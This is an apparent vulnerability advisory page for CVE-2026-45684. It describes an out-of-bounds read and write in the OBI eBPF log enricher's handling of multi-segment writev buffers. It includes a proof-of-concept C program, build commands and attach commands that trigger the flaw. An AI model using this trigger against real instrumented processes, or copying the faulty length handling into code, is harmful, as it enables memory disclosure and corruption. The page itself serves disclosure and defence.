CVE-2026-45684

CVSS v3.1

4.9

Medium

Vector

AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Summary

OBI's log enricher mishandles writev buffers by reading only the first iovec entry but using the total iov iter.count as the copy length. When log injection is enabled, a crafted multi-segment writev call can make OBI read and overwrite memory beyond the first segment.

Details

In bpf/logenricher/logenricher.c#L50, fill iov resolves only one struct iovec, specifically iov ctx.iov[0] for ITER IOVEC. The returned iov therefore describes only the first write segment.

However, write later uses const size t count = BPF CORE READ(from, count);, which is the total byte count across all segments in the iterator. That total is stored in e->len and used in bpf probe read user(e->log, e->len, iov.iov base) and bpf probe write user(iov.iov base, zero, to write).

If count exceeds iov.iov len, OBI reads and then zeroes memory past the end of the first segment. In practice, this can corrupt adjacent application buffers, leak memory into log events, and in some layouts destabilize the instrumented process.

PoC

Local testing with a minimal ASan harness reproduced the same out-of-bounds read/write condition as the vulnerable writev path.

Use a vulnerable build with the log enricher enabled.

git checkout v0.7.0
make build

Create a program that performs a two-element writev, where the first buffer is short and the second is large:

// save as /tmp/writev-poc.c
#define GNU SOURCE
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>

int main(void) {
 char a[8] = "HELLO
";
 char b[256];
 memset(b, 'B', sizeof(b));

 struct iovec iov[2];
 iov[0].iov base = a;
 iov[0].iov len = sizeof(a);
 iov[1].iov base = b;
 iov[1].iov len = sizeof(b);

 for (;;) {
  writev(1, iov, 2);
  usleep(10000);
 }
}

Compile and run it:

cc -O2 -o /tmp/writev-poc /tmp/writev-poc.c
/tmp/writev-poc >/dev/null

Attach OBI with log enrichment enabled to the running process:

PID=$(pgrep -f /tmp/writev-poc)
sudo ./bin/obi --pid "$PID"

On a vulnerable build, OBI copies iov iter.count bytes starting from iov[0].iov base, even though iov[0] is only 8 bytes long. Depending on allocator layout, you will see one of the following:

log events that include bytes beyond HELLO
corrupted stdout content because OBI zeroed memory beyond the first iovec
process instability or a crash

The issue is easiest to observe under a debugger or with ASan-enabled builds of the target program, but those are not required.

Impact

This is a memory safety flaw in the log-enrichment eBPF path. It affects deployments that enable log injection and instrument applications that write logs through writev. An attacker who can trigger the vulnerable local writev pattern inside the instrumented process can cause memory corruption or disclosure in that process. The most direct effects are corrupted output and adjacent-memory disclosure, with process instability possible if the overwrite lands on sensitive state.

Fix

Buffer Over-read

Memory Corruption

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-126CWE-787

Related Identifiers

CVE-2026-45684

GHSA-VVMG-8MJR-G6Q3

Affected Products

Go.Opentelemetry.Io/Obi

CVE-2026-45684

Summary

Details

PoC

Impact

Weakness Enumeration

Related Identifiers

Affected Products

References · 3